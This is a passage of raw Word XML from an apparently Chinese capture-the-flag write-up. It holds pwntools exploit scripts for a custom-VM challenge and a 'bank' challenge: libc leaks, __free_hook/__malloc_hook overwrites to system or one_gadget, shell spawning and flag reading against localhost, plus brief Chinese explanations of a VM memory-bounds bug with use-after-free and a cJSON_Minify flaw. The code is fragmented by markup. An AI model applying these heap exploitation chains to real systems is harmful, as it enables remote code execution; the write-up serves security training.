                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7281D71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return p64(code)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content.ljust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(8,'\x00') + p64(num)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2640C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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2890435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'BAN_CALL_ADDRESS':0x10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41748F9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'BAN_CALL_SYMBOL' :0x20,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB4662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'DEFENSE_BAN_STACK_MEMORY':0x40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C07E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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11B5562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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B796F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'PUSH':0x10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4226AE4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'POP':0x20,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F80CF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'CALL_SYMBOL':0x40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27173F2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        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DE443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06EC8AD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0x4f2c5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execve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End"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"/bin/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>", rsp+0x40, environ)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B961F4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constraints:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="093BFA1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rcx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== NULL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF4DB8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897A2B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0x4f322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execve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End"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"/bin/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>", rsp+0x40, environ)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4A0EF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constraints:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302BD97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[rsp+0x40] == NULL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D4280A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1B4D3E2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0x10a38c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execve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End"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"/bin/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>", rsp+0x70, environ)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D56820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constraints:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC7769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[rsp+0x70] == NULL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511EAC9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20CF2BC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46CFBA8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0x00000000001240a</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>2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0x5b002c72 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A3488B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0x000000000009df</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>14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0x63480034 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6DB7F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0x000000000014bd8</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>a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0x89002a41 ; ret 0xc166</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583820C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0x00000000000f574</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>c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0x8948fff2 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4E512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0x00000000000e55c</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>5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0x8948fff3 ; ret 0x8949</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="638C1D5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0x00000000000d64d</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>5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0x8948ffff ; ret 0xc031</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="114F245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0x</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0000000000062686 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> mov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edx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>, 0xf6000017 ; ret 0xf40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="243125B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0C80EC1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48ED3B6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#attack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500D394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("gift:0x")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265B6EF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int(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("\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n",True</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>),16)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBC3A6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lib.search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("/bin/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sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>\x00").next()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C19E20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lib.symbols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['__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']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0801FBF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malloc_hook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lib.symbols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['__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malloc_hook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']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2D0F1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realloc_hook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lib.symbols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['__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realloc_hook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']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA8108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system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lib.symbols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['system']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608F404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one_gadget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[0x4f2c5,0x4f322,0x10a38c,]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A265F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5B2FBEE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51BC7B7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46D9574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['BAN_CALL_SYMBOL'],'system',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF515F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47590EF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3E9F9F8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0CB6CAD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#system2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8F7B2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2A7589F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7A39FAE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['CALL_SYMBOL'],'system',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5A6E2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3140443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098552A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    '''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC0FA1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846C58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0E15AED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70E0D77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7CB742B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['BAN_CALL_SYMBOL'],'gets',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D86D61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58CF52E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24ACEE2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1939B79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#__free_hook2system2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56442E9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10BCF6F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3C5AD82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['CALL_SYMBOL'],'gets',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0422AD5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['POP'],'',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4160379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2341B86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['CALL_SYMBOL'],'free',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B4B4C3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02B8825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7B6C6C8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(p64(system))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098CC16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77E5548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3E8A86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7F90ED2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75E6CF6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32B075E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['BAN_CALL_SYMBOL'],'gets',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A892C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7C14F24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4A9E866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E96C85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#__free_hook2system2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3991019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0AF77A2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malloc_hook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531580F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['CALL_SYMBOL'],'gets',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B01149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['POP'],'',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737FB9A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0602ED0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['CALL_SYMBOL'],'malloc',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="394AFA0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0C66E75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62C6A82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(p64(system))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2F054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78E9D4A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D8FC12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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF15E0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1CB0946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3D3ACC5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spawnCode(defense_opcode['DEFENSE_BAN_STACK_MEMORY'],'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',lib</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>.symbols['__malloc_hook'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BD64D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63D374E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4237F2F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776FF68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#__malloc_hook2one_gadget2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D51268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4D3FFD8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2AEF1BB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['CALL_SYMBOL'],'gets',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3207CB6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['POP'],'',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7012C23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1AB0F69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['CALL_SYMBOL'],'free',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F0030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3FAFE72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5A446A7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(p64(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one_gadget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>[1]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB504C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74857DA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4031E8A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55B6194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45F4290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42D7F8B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['BAN_CALL_SYMBOL'],'execve',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726E781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13033B1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7DFDD41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0DBF4DA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#execve2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F13CA7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354B81F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2CC68E7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585456F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['CALL_SYMBOL'],'execve',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3699964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3D27EDE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3FDD856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3054019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21CD954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66E5CBE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18CCD68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054DEE6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['BAN_CALL_SYMBOL'],'execl',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C0A41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0E63CDB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25D6AFC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#execl2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3822532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17DC4A7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7922A95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41C8AD6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['CALL_SYMBOL'],'execl',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB1270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0934076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2C0BA5B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55E083D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212FAC3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3CEDDE1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0C6F0A9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1AF595E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['BAN_CALL_SYMBOL'],'execlp',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8472F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263C5D5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74D53E4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#execlp2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C3E13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7CA3111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16D41FC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62D3457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['CALL_SYMBOL'],'execlp',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1DE1D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3B6CF01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5D442C3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execlp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,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execvp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,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execle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1B608C0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61E99B4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59F7A4E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0C7CFF4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325A928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57B3F3F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['BAN_CALL_SYMBOL'],'execvp',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA27FE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4E10A2F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6F48E1D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#execvp2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0C64C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2882C2F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3B7F538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1EB53AC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['CALL_SYMBOL'],'execvp',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299D26C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0CE69B5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05E2C8D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683F2D8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5AC27CF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72400EC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1E83D15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4202E9E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['BAN_CALL_SYMBOL'],'execle',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04D4CB1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7281033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5A64E2C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#execl2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5C633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525782B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023F380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4E55DE5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['CALL_SYMBOL'],'execle',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F40132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682C156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7E3D5CB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131ACBF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060ED94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02B36FB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38D2567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defense_opcode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['BAN_CALL_SYMBOL'],'execv',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784AEA0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6D01934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707C824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#execl2getShell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739EDC7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307DD3F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binsh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6639B73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4F36CF4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['CALL_SYMBOL'],'execv',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BB0B9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16B8AB8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4598FD5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193B94E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1DCD02E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#defense</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF5BB6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fd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open(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defense","w</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>+")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A23239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spawnCode(defense_opcode['BAN_CALL_SYMBOL'],'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',lib</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>.symbols['execl'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1118B15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fd.write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(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5848D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fd.close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04F06CE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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    #orw2readflag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168F98B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''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE35FEE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36E3FC1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6349BA0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['CALL_SYMBOL'],'read',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E7315B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401589B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['PUSH'],'',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15500E3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['CALL_SYMBOL'],'open',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3E0F5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['PUSH'],'',3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DEB798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3936374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['CALL_SYMBOL'],'read',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FF2AE2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['PUSH'],'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>',_</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>_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free_hook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4C10CDF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#payload +=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spawnCode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attack_opcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>['CALL_SYMBOL'],'puts',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBA397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input(</w:t>
            </w:r>
            <w:proofErr w:type="gram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723CA2E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payload = base64.b64encode(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B41D1E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sh.sendlineafter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(":",payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471F6DDA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'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC62E9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1CF6545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sh.interactive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  <w:p w14:paraId="310F30C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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ECF169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gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"127.0.0.1",8888,0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="622A2942" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067DB327" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39F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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>粤湾银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EA168" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本题实现了一个自定义的指令集，程序有几个基础功能，分别是新建，运行，删除，在虚拟机的指令编写中，因为没有规定好虚拟内存与真实内存的范围，导致了可以访问真实内存的问题，配合上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uaf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>，即可控制程序的执行流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FB" w:rsidRPr="001027CA" w14:paraId="0B3C97F4" w14:textId="77777777" w:rsidTr="00414E95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2692DC2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from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pwn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import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B13FDE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from time import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78FFB8C4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context.log_level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'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056026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54A54046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#r = process(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"./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>vm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629F928C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 xml:space="preserve">r = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"127.0.0.1",9999)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC5EBE3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("&gt;&gt;&gt; ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F733F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("1")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B905B2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shellcode = [83,6,252,0,0,0,0,3,6,16,1,67,3,1,0,0,0,16,1,67,3,1,0,0,0,16,1,67,3,1,0,0,0,16,1,1,0,6,0,83,0,72,0,0,0,0,3,0,3,2,4,0,0,0,192,8,16,0,32,3,48,2,211,2,0,0,0,0,241,244,176]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0690C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sc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"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>([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chr</w:t>
            </w:r>
            <w:proofErr w:type="spell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i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) for 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i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in shellcode])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62ED34C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gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>sleep(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410E944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sc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675A52E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0F2B918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("&gt;&gt;&gt; ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157BD76B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("3")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B03EDC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70C4BC55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r.recvuntil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("&gt;&gt;&gt; ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467A0410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("2")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51FAA4F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gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>sleep(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179778B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u32(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r.recv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(4))-0x1b27b0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FDD36D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= u32(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r.recv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(4))-0x1b07b0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA4CE1F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print hex(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>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498446B7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r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>#</w:t>
            </w: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(p32(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+ 0x3ac69)+"1")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7299B0F2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(p32(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>libc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 0x3a819)+"1")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D262549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r.sendline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("cat flag")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B710E41" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="001027CA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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>r.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4616D536" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FE4886" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39F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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>粤湾保险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A314559" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本题基于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cJSON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 xml:space="preserve">设计，原本是平时使用的json-parser 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fuzzer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>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E4D29" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后来改成根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json大小分类测试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cJSON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 xml:space="preserve"> API。漏洞在cJSON1.7.10的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cJSON_Minify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>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0422F1F8" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
